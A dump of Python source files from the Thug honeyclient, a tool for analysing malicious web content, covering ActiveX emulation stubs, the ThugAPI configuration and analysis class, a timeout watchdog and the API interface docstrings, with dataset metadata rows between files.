import logging
log = logging.getLogger("Thug")
def Add(self, value):
    """Append `value` to the backing list and return the index it was stored at.

    Uses the new length rather than list.index(), which the original called:
    index() returns the position of the FIRST equal element, so adding a
    duplicate value reported the wrong index (ArrayList.Add must return the
    index at which the value was added).
    """
    log.ThugLogging.add_behavior_warn("[System.Collections.ArrayList] Add")
    self.arraylist.append(value)
    return len(self.arraylist) - 1
def ToArray(self):
    """Return a shallow copy of the backing list."""
    log.ThugLogging.add_behavior_warn("[System.Collections.ArrayList] ToArray")
    return self.arraylist[:]
| 353
|
Python
|
.py
| 9
| 35.444444
| 79
| 0.769912
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,042
|
FromBase64Transform.py
|
buffer_thug/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
|
import base64
import logging
log = logging.getLogger("Thug")
def TransformFinalBlock(self, buffer, offset, count):
    """Base64-decode `count` characters of `buffer` starting at `offset`.

    NOTE(review): assumes `buffer` is a str or a sequence of 1-char strings
    (it is joined before decoding) — confirm against callers.
    """
    log.ThugLogging.add_behavior_warn(
        "[System.Security.Cryptography.FromBase64ToTransform] TransformFinalBlock"
    )
    chunk = "".join(buffer[offset : offset + count])
    return bytes(base64.b64decode(chunk))
| 323
|
Python
|
.py
| 8
| 36.5
| 82
| 0.766026
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,043
|
OpaqueFilter.py
|
buffer_thug/thug/ThugAPI/OpaqueFilter.py
|
#!/usr/bin/env python
#
# OpaqueFilter.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
class OpaqueFilter(logging.Filter):
    """Logging filter that suppresses every record it sees.

    Attached to stream handlers to silence console output in quiet mode.
    """

    def filter(self, record):
        # Reject unconditionally.
        return False
| 787
|
Python
|
.py
| 21
| 35.761905
| 70
| 0.777195
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,044
|
ThugAPI.py
|
buffer_thug/thug/ThugAPI/ThugAPI.py
|
#!/usr/bin/env python
#
# ThugAPI.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import os
import sys
import logging
from urllib.parse import urlparse
import bs4
from zope.interface import implementer
import thug
from thug.DOM.W3C import w3c
from thug.DOM.DFT import DFT
from thug.DOM.Window import Window
from thug.DOM.HTTPSession import HTTPSession
from thug.DOM.HTMLInspector import HTMLInspector
from thug.DOM.MIMEHandler import MIMEHandler
from thug.DOM.SchemeHandler import SchemeHandler
from thug.WebTracking.WebTracking import WebTracking
from thug.Encoding.Encoding import Encoding
from thug.Magic.Magic import Magic
from thug.Logging.ThugLogging import ThugLogging
from thug.DOM.W3C.Core.DOMImplementation import DOMImplementation
from thug.DOM.JSEngine import JSEngine
from thug.Classifier.JSClassifier import JSClassifier
from thug.Classifier.VBSClassifier import VBSClassifier
from thug.Classifier.URLClassifier import URLClassifier
from thug.Classifier.HTMLClassifier import HTMLClassifier
from thug.Classifier.TextClassifier import TextClassifier
from thug.Classifier.CookieClassifier import CookieClassifier
from thug.Classifier.SampleClassifier import SampleClassifier
from thug.Classifier.ImageClassifier import ImageClassifier
from .IThugAPI import IThugAPI
from .ThugOpts import ThugOpts
from .Watchdog import Watchdog
from .OpaqueFilter import OpaqueFilter
from .abstractmethod import abstractmethod
from .ThugVulnModules import ThugVulnModules
log = logging.getLogger("Thug")
log.setLevel(logging.WARN)
@implementer(IThugAPI)
class ThugAPI:
    """Main Thug honeyclient API.

    Wires up the JS engine, core services, classifiers and logging on the
    module-level "Thug" logger (which is used as a global service registry),
    and exposes the option getters/setters plus the run_local/run_remote
    analysis entry points.  Subclasses implement analyze().
    """

    def __init__(self, configuration_path=thug.__configuration_path__):
        # Order matters: configuration first, then engine/core, then the
        # caches and classifiers that depend on them.
        self.__init_conf(configuration_path)
        self.__init_jsengine()
        self.__init_pyhooks()
        self.__init_core()
        self.__init_objcache()
        self.__init_urlobjects()
        self.__init_classifiers()
        self.__init_opaque_filter()
        self.__init_trace()

    def __init_conf(self, configuration_path):
        log.configuration_path = configuration_path
        log.personalities_path = (
            thug.__personalities_path__ if configuration_path else None
        )

    def __init_jsengine(self):
        log.JSEngine = JSEngine()

    def __init_core(self):
        # Core services are registered as attributes on the shared logger.
        log.ThugOpts = ThugOpts()
        log.ThugVulnModules = ThugVulnModules()
        log.MIMEHandler = MIMEHandler()
        log.SchemeHandler = SchemeHandler()
        log.Encoding = Encoding()
        log.Magic = Magic()
        log.WebTracking = WebTracking()
        log.HTMLInspector = HTMLInspector()

    def __init_urlobjects(self):
        log.UrlObjects = {}

    def __init_objcache(self):
        log.Window = Window
        log.DOMImplementation = DOMImplementation

    def __init_classifiers(self):
        log.HTMLClassifier = HTMLClassifier()
        log.JSClassifier = JSClassifier()
        log.VBSClassifier = VBSClassifier()
        log.URLClassifier = URLClassifier()
        log.SampleClassifier = SampleClassifier()
        log.TextClassifier = TextClassifier()
        log.CookieClassifier = CookieClassifier()
        log.ImageClassifier = ImageClassifier()

        # Lowercased type name -> classifier instance, used by
        # add_customclassifier and the reset helpers.
        self.classifiers_map = {
            "html": log.HTMLClassifier,
            "js": log.JSClassifier,
            "vbs": log.VBSClassifier,
            "url": log.URLClassifier,
            "sample": log.SampleClassifier,
            "cookie": log.CookieClassifier,
            "text": log.TextClassifier,
            "image": log.ImageClassifier,
        }

    def __init_pyhooks(self):
        log.PyHooks = {}

    def __init_trace(self):
        log.Trace = None

    def __init_opaque_filter(self):
        self.opaque_filter = OpaqueFilter()

    def __call__(self):  # pragma: no cover
        self.analyze()

    def version(self):
        """Print Thug version information and exit."""
        print(
            f"Thug "
            f"{thug.__version__} "
            f"(JS Engine: {thug.__jsengine__} v{thug.__jsengine_version__})"
        )
        sys.exit(0)

    # --- Option getters/setters (thin wrappers around log.ThugOpts) ---

    def get_useragent(self):
        return log.ThugOpts.useragent

    def set_useragent(self, useragent):
        log.ThugOpts.useragent = useragent

    def get_events(self):
        return log.ThugOpts.events

    def set_events(self, events):
        log.ThugOpts.events = events

    def get_delay(self):
        return log.ThugOpts.delay

    def set_delay(self, delay):
        log.ThugOpts.delay = delay

    def get_attachment(self):
        return log.ThugOpts.attachment

    def set_attachment(self):
        log.ThugOpts.attachment = True

    def get_image_processing(self):
        return log.ThugOpts.image_processing

    def set_image_processing(self):
        log.ThugOpts.image_processing = True

    def reset_image_processing(self):
        log.ThugOpts.image_processing = False

    def get_file_logging(self):
        return log.ThugOpts.file_logging

    def set_file_logging(self):
        log.ThugOpts.file_logging = True

    def get_json_logging(self):
        return log.ThugOpts.json_logging

    def set_json_logging(self):
        log.ThugOpts.json_logging = True

    def get_elasticsearch_logging(self):
        return log.ThugOpts.elasticsearch_logging

    def set_elasticsearch_logging(self):
        log.ThugOpts.elasticsearch_logging = True
        # Silence the noisy elasticsearch client logger.
        logging.getLogger("elasticsearch").setLevel(logging.ERROR)

    def get_features_logging(self):
        return log.ThugOpts.features_logging

    def set_features_logging(self):
        log.ThugOpts.features_logging = True

    def reset_features_logging(self):
        log.ThugOpts.features_logging = False

    def get_referer(self):
        return log.ThugOpts.referer

    def set_referer(self, referer):
        log.ThugOpts.referer = referer

    def get_proxy(self):
        return log.ThugOpts.proxy

    def set_proxy(self, proxy):
        log.ThugOpts.proxy = proxy

    def get_raise_for_proxy(self):
        return log.ThugOpts.raise_for_proxy

    def set_raise_for_proxy(self, raise_for_proxy):
        log.ThugOpts.raise_for_proxy = raise_for_proxy

    def set_no_fetch(self):
        log.ThugOpts.no_fetch = True

    def enable_download_prevent(self):
        log.ThugOpts.download_prevent = True

    def disable_download_prevent(self):
        log.ThugOpts.download_prevent = False

    def set_verbose(self):
        log.ThugOpts.verbose = True
        log.setLevel(logging.INFO)

    def set_debug(self):
        log.ThugOpts.debug = True
        log.setLevel(logging.DEBUG)

    def set_ast_debug(self):
        log.ThugOpts.ast_debug = True

    def set_http_debug(self):
        # Incremented (not set): each call raises the HTTP debug level.
        log.ThugOpts.http_debug += 1

    def set_acropdf_pdf(self, acropdf_pdf):
        log.ThugVulnModules.acropdf_pdf = acropdf_pdf

    def disable_acropdf(self):
        log.ThugVulnModules.disable_acropdf()

    def set_shockwave_flash(self, shockwave):
        log.ThugVulnModules.shockwave_flash = shockwave

    def disable_shockwave_flash(self):
        log.ThugVulnModules.disable_shockwave_flash()

    def set_javaplugin(self, javaplugin):
        log.ThugVulnModules.javaplugin = javaplugin

    def disable_javaplugin(self):
        log.ThugVulnModules.disable_javaplugin()

    def set_silverlight(self, silverlight):
        log.ThugVulnModules.silverlight = silverlight

    def disable_silverlight(self):
        log.ThugVulnModules.disable_silverlight()

    def get_threshold(self):
        return log.ThugOpts.threshold

    def set_threshold(self, threshold):
        log.ThugOpts.threshold = threshold

    def get_extensive(self):
        return log.ThugOpts.extensive

    def set_extensive(self):
        log.ThugOpts.extensive = True

    def reset_extensive(self):
        log.ThugOpts.extensive = False

    def get_timeout(self):
        return log.ThugOpts.timeout

    def set_timeout(self, timeout):
        log.ThugOpts.timeout = timeout

    def get_connect_timeout(self):
        return log.ThugOpts.connect_timeout

    def set_connect_timeout(self, timeout):
        log.ThugOpts.connect_timeout = timeout

    def get_proxy_connect_timeout(self):
        return log.ThugOpts.proxy_connect_timeout

    def set_proxy_connect_timeout(self, timeout):
        log.ThugOpts.proxy_connect_timeout = timeout

    def get_broken_url(self):
        return log.ThugOpts.broken_url

    def set_broken_url(self):
        log.ThugOpts.broken_url = True

    def get_ssl_verify(self):
        return log.ThugOpts.ssl_verify

    def set_ssl_verify(self):
        log.ThugOpts.ssl_verify = True

    def get_web_tracking(self):
        return log.ThugOpts.web_tracking

    def set_web_tracking(self):
        log.ThugOpts.web_tracking = True

    def get_async_prefetch(self):
        return log.ThugOpts.async_prefetch

    def set_async_prefetch(self):
        log.ThugOpts.async_prefetch = True

    def reset_async_prefetch(self):
        log.ThugOpts.async_prefetch = False

    def disable_honeyagent(self):
        log.ThugOpts.honeyagent = False

    def enable_code_logging(self):
        log.ThugOpts.code_logging = True

    def disable_code_logging(self):
        log.ThugOpts.code_logging = False

    def enable_cert_logging(self):
        log.ThugOpts.cert_logging = True

    def disable_cert_logging(self):
        log.ThugOpts.cert_logging = False

    def enable_screenshot(self):
        log.ThugOpts.screenshot = True

    def disable_screenshot(self):
        log.ThugOpts.screenshot = False

    def enable_awis(self):
        log.ThugOpts.awis = True

    def disable_awis(self):
        log.ThugOpts.awis = False

    # --- Logging setup ---

    def log_init(self, url):
        log.ThugLogging = ThugLogging()
        log.ThugLogging.set_basedir(url)

    def set_log_dir(self, logdir):
        log.ThugLogging.set_absbasedir(logdir)

    def set_log_output(self, output):
        fh = logging.FileHandler(output)
        log.addHandler(fh)

    def set_log_quiet(self):  # pragma: no cover
        # Attach the opaque filter so console StreamHandlers drop all records.
        root = logging.getLogger()
        for handler in root.handlers:
            if isinstance(handler, logging.StreamHandler):
                handler.addFilter(self.opaque_filter)

    def set_log_verbose(self):
        root = logging.getLogger()
        for handler in root.handlers:
            if isinstance(handler, logging.StreamHandler):
                handler.removeFilter(self.opaque_filter)

    def get_mongodb_address(self):
        return log.ThugOpts.mongodb_address

    def set_mongodb_address(self, mongodb_address):
        log.ThugOpts.mongodb_address = mongodb_address

    # --- Classifier rule/filter registration ---

    def add_htmlclassifier(self, rule):
        log.HTMLClassifier.add_rule(rule)

    def add_urlclassifier(self, rule):
        log.URLClassifier.add_rule(rule)

    def add_jsclassifier(self, rule):
        log.JSClassifier.add_rule(rule)

    def add_vbsclassifier(self, rule):
        log.VBSClassifier.add_rule(rule)

    def add_textclassifier(self, rule):
        log.TextClassifier.add_rule(rule)

    def add_cookieclassifier(self, rule):
        log.CookieClassifier.add_rule(rule)

    def add_sampleclassifier(self, rule):
        log.SampleClassifier.add_rule(rule)

    def add_imageclassifier(self, rule):
        log.ImageClassifier.add_rule(rule)

    def add_htmlfilter(self, f):
        log.HTMLClassifier.add_filter(f)

    def add_urlfilter(self, f):
        log.URLClassifier.add_filter(f)

    def add_jsfilter(self, f):
        log.JSClassifier.add_filter(f)

    def add_vbsfilter(self, f):
        log.VBSClassifier.add_filter(f)

    def add_textfilter(self, f):
        log.TextClassifier.add_filter(f)

    def add_cookiefilter(self, f):
        log.CookieClassifier.add_filter(f)

    def add_samplefilter(self, f):
        log.SampleClassifier.add_filter(f)

    def add_imagefilter(self, f):
        log.ImageClassifier.add_filter(f)

    def add_customclassifier(self, cls_type, method):
        """Register a custom classifier callable for the given type name."""
        classifier_type = cls_type.lower().strip()

        if classifier_type not in self.classifiers_map:
            log.warning("Skipping unknown classifier type %s", cls_type)
            return

        self.classifiers_map[classifier_type].add_customclassifier(method)

    def reset_customclassifiers(self):
        for c in self.classifiers_map.values():
            c.reset_customclassifiers()

    def register_pyhook(self, module, method, hook):
        """Register a Python hook for module.method, creating the slot on demand."""
        if module not in log.PyHooks:
            log.PyHooks[module] = {}

        log.PyHooks[module][method] = hook

    def log_event(self):
        log.ThugLogging.log_event()

    def watchdog_cb(self, signum, frame):  # pragma: no cover
        # Default watchdog callback: subclasses may override.
        pass

    def __reset_classifiers_matches(self):
        for c in self.classifiers_map.values():
            c.reset_matches()

    def __run(self, window):
        """Run the DFT analysis on `window` under the JS lock and watchdog."""
        if log.Trace:  # pragma: no cover
            sys.settrace(log.Trace)

        with log.JSEngine.JSLocker:
            with Watchdog(log.ThugOpts.timeout, callback=self.watchdog_cb):
                dft = DFT(window)
                dft.run()

    def run_local(self, url):
        """Analyze a local file.

        Plain JavaScript files (.js/.jse) are wrapped into a minimal HTML
        document (or have their existing <script> extracted) before parsing;
        anything else is parsed as-is.
        """
        from bs4.element import NavigableString
        from bs4.element import CData
        from bs4.element import Script
        from lxml.html import tostring
        from lxml.html import builder as E

        self.__reset_classifiers_matches()
        log.last_url = None
        log.last_url_fetched = None

        log.ThugLogging.set_url(url)
        log.ThugOpts.local = True

        log.HTTPSession = HTTPSession()

        with open(url, "r", encoding="utf-8") as fd:
            content = fd.read()

        extension = os.path.splitext(url)

        if len(extension) > 1 and extension[1].lower() in (
            ".js",
            ".jse",
        ):
            if not content.lstrip().startswith("<script"):
                # Bare JS: wrap it into <html><head/><body><script>...</script>.
                html = tostring(E.HTML(E.HEAD(), E.BODY(E.SCRIPT(content))))
            else:
                # JS already wrapped in <script>: strip html5lib's implied
                # html/head/body wrappers and rebuild a clean document.
                soup = bs4.BeautifulSoup(content, "html5lib")

                try:
                    soup.html.unwrap()
                except AttributeError:  # pragma: no cover
                    pass

                try:
                    soup.head.unwrap()
                except AttributeError:  # pragma: no cover
                    pass

                try:
                    soup.body.unwrap()
                except AttributeError:  # pragma: no cover
                    pass

                code = soup.script.get_text(types=(NavigableString, CData, Script))
                html = tostring(E.HTML(E.HEAD(), E.BODY(E.SCRIPT(code))))
        else:
            html = content

        if log.ThugOpts.features_logging:
            log.ThugLogging.Features.add_characters_count(len(html))

            whitespaces_count = len(
                [a for a in html if isinstance(a, str) and a.isspace()]
            )
            log.ThugLogging.Features.add_whitespaces_count(whitespaces_count)

        doc = w3c.parseString(html)
        window = Window("about:blank", doc, personality=log.ThugOpts.useragent)
        window.open()
        self.__run(window)

    def run_remote(self, url):
        """Analyze a remote URL, defaulting the scheme to http:// if missing."""
        self.__reset_classifiers_matches()
        log.last_url = None
        log.last_url_fetched = None

        log.ThugOpts.local = False

        try:
            scheme = urlparse(url).scheme
        except ValueError as e:  # pragma: no cover
            log.warning("[WARNING] Analysis not performed (%s)", str(e))
            return

        if not scheme or not scheme.startswith("http"):
            url = f"http://{url}"

        log.ThugLogging.set_url(url)

        log.HTTPSession = HTTPSession()

        doc = w3c.parseString("")
        window = Window(log.ThugOpts.referer, doc, personality=log.ThugOpts.useragent)
        window = window.open(url)

        if window:
            self.__run(window)

    @abstractmethod
    def analyze(self):  # pragma: no cover
        pass
| 16,364
|
Python
|
.py
| 415
| 31.436145
| 86
| 0.667426
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,045
|
Watchdog.py
|
buffer_thug/thug/ThugAPI/Watchdog.py
|
#!/usr/bin/env python
#
# Watchdog.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import os
import sys
import signal
import logging
class Watchdog:
    """Context manager that aborts the analysis after `timeout` seconds.

    On entry a SIGALRM is armed; on exit the alarm is cancelled.  When the
    alarm fires, handler() logs a critical message, invokes the optional
    callback, flushes the Thug event log and terminates the process.
    """

    def __init__(self, timeout, callback=None):
        self.timeout = timeout
        self.callback = callback

    def __enter__(self):
        signal.signal(signal.SIGALRM, self.handler)
        signal.alarm(self.timeout)

    def __exit__(self, exception_type, exception_value, traceback):
        # Disarm the pending alarm regardless of how the block exited.
        signal.alarm(0)

    def handler(self, signum, frame):
        thugLog = logging.getLogger("Thug")
        thugLog.critical(
            "The analysis took more than %d second(s). Aborting!", self.timeout
        )

        if self.callback:
            self.callback(signum, frame)

        # ThugLogging is attached to the "Thug" logger by ThugAPI.log_init.
        thugLog.ThugLogging.log_event()
        pid = os.getpid()

        # If Thug is running in a Docker container it is assigned PID 1
        # and Docker apparently ignores SIGTERM signals to PID 1
        if pid in (1,):  # pragma: no cover
            sys.exit(1)
        else:
            os.kill(pid, signal.SIGTERM)
| 1,661
|
Python
|
.py
| 45
| 31.6
| 79
| 0.690535
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,046
|
IThugAPI.py
|
buffer_thug/thug/ThugAPI/IThugAPI.py
|
#!/usr/bin/env python
#
# IThugAPI.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import zope.interface
class IThugAPI(zope.interface.Interface):
def version():
"""
Print Thug version and exit
@return: None
"""
def get_useragent():
"""
get_useragent
Return the emulated user agent
@return: user agent string
"""
def set_useragent(useragent):
"""
set_useragent
Set the user agent to emulate
@param useragent: the user agent to emulate
@type useragent: C{str}
@return: None
"""
def get_events():
"""
get_events
Return the DOM events to emulate
Note: the load and mousemove are emulated by default and are not included in
the returned list
@return: List of the DOM events to emulate
"""
def set_events(events):
"""
set_events
Set the DOM events to emulate
Note: the load and mousemove events are emulated by default and do not
need to be added through set_events
@param events: comma separated list of DOM events to emulate
@type events: C{str}
@return: None
"""
def get_delay():
"""
get_delay
Return the maximum setTimeout/setInterval delay value (in milliseconds)
@return: maximum delay value (in milliseconds)
"""
def set_delay(delay):
"""
set_delay
Set a maximum setTimeout/setInterval delay value (in milliseconds)
@param delay: maximum delay value (in milliseconds)
@type delay: C{int}
@return: None
"""
def get_attachment():
"""
get_attachment
Return True if the attachment mode is set, False otherwise
@return: boolean
"""
def set_attachment(attachment):
"""
set_attachment
Set the attachment mode to the specified value
@param attachment: enable/disable attachment mode
@type delay: C{bool}
@return: None
"""
def get_image_processing():
"""
get_image_processing
Return True if the attachment mode is set, False otherwise
@return: boolean
"""
def set_image_processing():
"""
set_image_processing
Enable image processing mode
@return: None
"""
def reset_image_processing():
"""
reset_image_processing
Disable image processing mode
@return: None
"""
def enable_download_prevent():
"""
set_download_prevent
Enable download prevention mode
@return: None
"""
def disable_download_prevent():
"""
reset_image_processing
Disable download prevention mode
@return: None
"""
def get_file_logging():
"""
get_file_logging
Return True if file logging mode is enabled, False otherwise.
@return: boolean
"""
def set_file_logging():
"""
set_file_logging
Enable file logging mode
@return: None
"""
def get_json_logging():
    """
    get_json_logging

    Return True if JSON logging mode is enabled, False otherwise.

    @return: boolean
    """

def set_json_logging():
    """
    set_json_logging

    Enable JSON logging mode

    @return: None
    """
def get_features_logging():
"""
get_features_logging
Return True if features logging mode is enabled, False otherwise.
@return: boolean
"""
def set_features_logging():
"""
set_features_logging
Enable features logging mode
@return: None
"""
def reset_features_logging():
"""
reset_features_logging
Reset features logging mode
@return: None
"""
def get_elasticsearch_logging():
"""
get_elasticsearch_logging
Return True if ElasticSearch logging mode is enabled, False otherwise.
@return: boolean
"""
def set_elasticsearch_logging():
"""
set_elasticsearch_logging
Enable ElasticSearch logging mode
@return: None
"""
def get_referer():
"""
get_referer
Return the emulated referer
@return: referer value
"""
def set_referer(referer):
"""
set_referer
Set the referer to be emulated
@param referer: referer
@type referer: C{str}
@return: None
"""
def get_proxy():
"""
get_proxy
Get the proxy server to be used for establishing the connection
@return: proxy server
"""
def set_proxy(proxy):
"""
set_proxy
Set the proxy server to be used for establishing the connection
@param proxy: proxy server
@type proxy: C{str}
@return: None
"""
def get_raise_for_proxy():
"""
get_raise_for_proxy
Get the raise_for_proxy flag. If the flag is True (default) a ValueError exception
is raised if the specified proxy is not available.
@return: boolean
"""
def set_raise_for_proxy(raise_for_proxy):
"""
set_raise_for_proxy
Set the raise_for_proxy flag. If the flag is True (default) a ValueError exception
is raised if the specified proxy is not available.
@param raise_for_proxy: raise_for_proxy flag
@type: raise_for_proxy: boolean
@return: None
"""
def set_no_fetch():
"""
set_no_fetch
Prevent remote content fetching in any case
@return: None
"""
def set_verbose():
"""
set_verbose
Enable Thug verbose mode
@return: None
"""
def set_debug():
"""
set_debug
Enable Thug debug mode
@return: None
"""
def set_http_debug():
"""
set_http_debug
Enable Thug HTTP debug mode
@return: None
"""
def set_acropdf_pdf(acropdf_pdf):
"""
set_acropdf_pdf
Set the Adobe Acrobat Reader version
@param acropdf_pdf: Adobe Acrobat Reader version
@type acropdf_pdf: C{str}
@return: None
"""
def disable_acropdf():
"""
disable_acropdf
Disable Adobe Acrobat Reader
@return: None
"""
def set_shockwave_flash(shockwave):
"""
set_shockwave_flash
Set the Shockwave Flash version (supported versions: 8, 9, 10, 11, 12)
@param shockwave: Shockwave Flash version
@type shockwave: C{str}
@return: None
"""
def disable_shockwave_flash():
"""
disable_shockwave_flash
Disable Shockwave Flash
@return: None
"""
def set_javaplugin(javaplugin):
"""
set_javaplugin
Set the Java plugin version
@param javaplugin: Java plugin version
@type javaplugin: C{str}
@return: None
"""
def disable_javaplugin():
"""
disable_javaplugin
Disable Java plugin
@return: None
"""
def set_silverlight(silverlight):
"""
set_silverlight
Set the SilverLight version
@param silverlight: SilverLight version
@type silverlight: C{str}
@return: None
"""
def disable_silverlight():
"""
disable_silverlight
Disable SilverLight
@return: None
"""
def get_threshold():
"""
get_threshold
Get the maximum number of pages to fetch
@return: the maximum number of pages to fetch
"""
def set_threshold(threshold):
"""
set_threshold
Set the maximum number of pages to fetch
@param threshold: the maximum number of pages to fetch
@type threshold: C{int}
@return: None
"""
def get_extensive():
"""
get_extensive
Get the current extensive fetch of linked pages mode
@return: None
"""
def set_extensive():
"""
set_extensive
Set the extensive fetch of linked pages mode
@return: None
"""
def reset_extensive():
"""
reset_extensive
Reset the extensive fetch of linked pages mode
@return: None
"""
def get_connect_timeout():
"""
get_connect_timeout
Get the connect timeout (in seconds)
@return: the connect timeout (in seconds)
"""
def set_connect_timeout(timeout):
"""
set_connect_timeout
Set the connect timeout (in seconds)
@param timeout: the connect timeout (in seconds)
@type timeout: C{int}
@return: None
"""
def get_proxy_connect_timeout():
"""
get_proxy_connect_timeout
Get the proxy connect timeout (in seconds)
@return: the proxy connect timeout (in seconds)
"""
def set_proxy_connect_timeout(timeout):
"""
set_proxy_connect_timeout
Set the proxy connect timeout (in seconds)
@param timeout: the proxy connect timeout (in seconds)
@type timeout: C{int}
@return: None
"""
def get_timeout():
"""
get_timeout
Get the analysis timeout (in seconds)
@return: the analysis timeout (in seconds)
"""
def set_timeout(timeout):
"""
set_timeout
Set the analysis timeout (in seconds)
@param timeout: the analysis timeout (in seconds)
@type timeout: C{int}
@return: None
"""
def get_broken_url():
"""
get_broken_url
Get the broken URL mode
@return mode: broken URL mode
"""
def set_broken_url():
"""
set_broken_url
Set the broken URL mode
@return: None
"""
def disable_honeyagent():
"""
disable_honeyagent
Disable HoneyAgent Java sandbox analysis
@return: None
"""
def enable_code_logging():
"""
enable_code_logging
Enable code logging
@return: None
"""
def disable_code_logging():
"""
disable_code_logging
Disable code logging
@return: None
"""
def enable_cert_logging():
"""
enable_cert_logging
Enable SSL/TLS certificate logging
@return: None
"""
def disable_cert_logging():
"""
disable_cert_logging
Disable SSL/TLS certificate logging
@return: None
"""
def enable_screenshot():
"""
enable_screenshot
Enable screenshot mode
@return: None
"""
def disable_screenshot():
"""
disable_screenshot
Disable screenshot mode
@return: None
"""
def log_init(url):
"""
log_init
Initialize logging subsystem
@param url: URL to analyze
@type url: C{str}
@return: None
"""
def set_log_dir(logdir):
"""
set_log_dir
Set the log output directory
@param logdir: the log output directory
@type logdir: C{str}
@return: None
"""
def set_log_output(output):
"""
set_log_output
Set the log output file
@param output: the log output file
@type output: C{str}
@return: None
"""
def set_log_quiet():
"""
set_log_quiet
Disable console logging
@return: None
"""
def set_log_verbose():
"""
set_log_verbose
Enable console logging
@return: None
"""
def get_web_tracking():
"""
get_web_tracking
Return True if web client tracking inspection is enabled, False otherwise.
@return: bool
"""
def set_web_tracking():
"""
set_web_tracking
Enable web client tracking inspection
@return: None
"""
def get_async_prefetch():
"""
get_async_prefetch
Return True if asynchronous prefetching mode is enabled, False otherwise.
@return: bool
"""
def set_async_prefetch():
"""
set_async_prefetch
Enable asynchronous prefetching mode
@return: None
"""
def reset_async_prefetch():
    """
    reset_async_prefetch

    Disable asynchronous prefetching mode

    @return: None
    """
def add_urlclassifier(rule):
"""
add_urlclassifier
Add an additional URL classifier rule file
@param rule: URL classifier rule file
@type rule: C{str}
@return: None
"""
def add_htmlclassifier(rule):
"""
add_htmlclassifier
Add an additional HTML classifier rule file
@param rule: HTML classifier rule file
@type rule: C{str}
@return: None
"""
def add_jsclassifier(rule):
"""
add_jsclassifier
Add an additional JS classifier rule file
@param rule: JS classifier rule file
@type rule: C{str}
@return: None
"""
def add_vbsclassifier(rule):
"""
add_vbsclassifier
Add an additional VBS classifier rule file
@param rule: VBS classifier rule file
@type rule: C{str}
@return: None
"""
def add_textclassifier(rule):
"""
add_textclassifier
Add an additional Text classifier rule file
@param rule: Text classifier rule file
@type rule: C{str}
@return: None
"""
def add_cookieclassifier(rule):
"""
add_cookieclassifier
Add an additional Cookie classifier rule file
@param rule: Cookie classifier rule file
@type rule: C{str}
@return: None
"""
def add_sampleclassifier(rule):
"""
add_sampleclassifier
Add an additional sample classifier rule file
@param rule: Sample classifier rule file
@type rule: C{str}
@return: None
"""
def add_imageclassifier(rule):
"""
add_imageclassifier
Add an additional image classifier rule file
@param rule: Image classifier rule file
@type rule: C{str}
@return: None
"""
def add_urlfilter(filter):
"""
add_urlfilter
Add an additional URL filter file
@param filter: URL filter file
@type filter: C{str}
@return: None
"""
def add_htmlfilter(filter):
"""
add_htmlfilter
Add an additional HTML filter file
@param filter: HTML filter file
@type filter: C{str}
@return: None
"""
def add_jsfilter(filter):
"""
add_jsfilter
Add an additional JS filter file
@param filter: JS filter file
@type filter: C{str}
@return: None
"""
def add_vbsfilter(filter):
"""
add_vbsfilter
Add an additional VBS filter file
@param filter: VBS filter file
@type filter: C{str}
@return: None
"""
def add_textfilter(filter):
"""
add_textfilter
Add an additional Text filter file
@param filter: Text filter file
@type filter: C{str}
@return: None
"""
def add_cookiefilter(filter):
"""
add_cookiefilter
Add an additional Cookie filter file
@param filter: Cookie filter file
@type filter: C{str}
@return: None
"""
def add_samplefilter(filter):
"""
add_samplefilter
Add an additional sample filter file
@param filter: Sample filter file
@type filter: C{str}
@return: None
"""
def add_imagefilter(filter):
"""
add_imagefilter
Add an additional image filter file
@param filter: Image filter file
@type filter: C{str}
@return: None
"""
def add_customclassifier(cls_type, method):
"""
add_customclassifier
Add a custom classifier.
The parameter `cls_type' can assume the values
html
js
vbs
url
text
sample
image
and defines the custom classifier scope.
The parameter `method' is the method (not its name) to be additionally invoked.
The method parameters depend on the `cls_type' value and are listed here for
convenience
html method(url, html)
js method(url, script)
vbs method(url, script)
url method(url)
text method(url, text)
sample method(sample, md5)
image method(url, text)
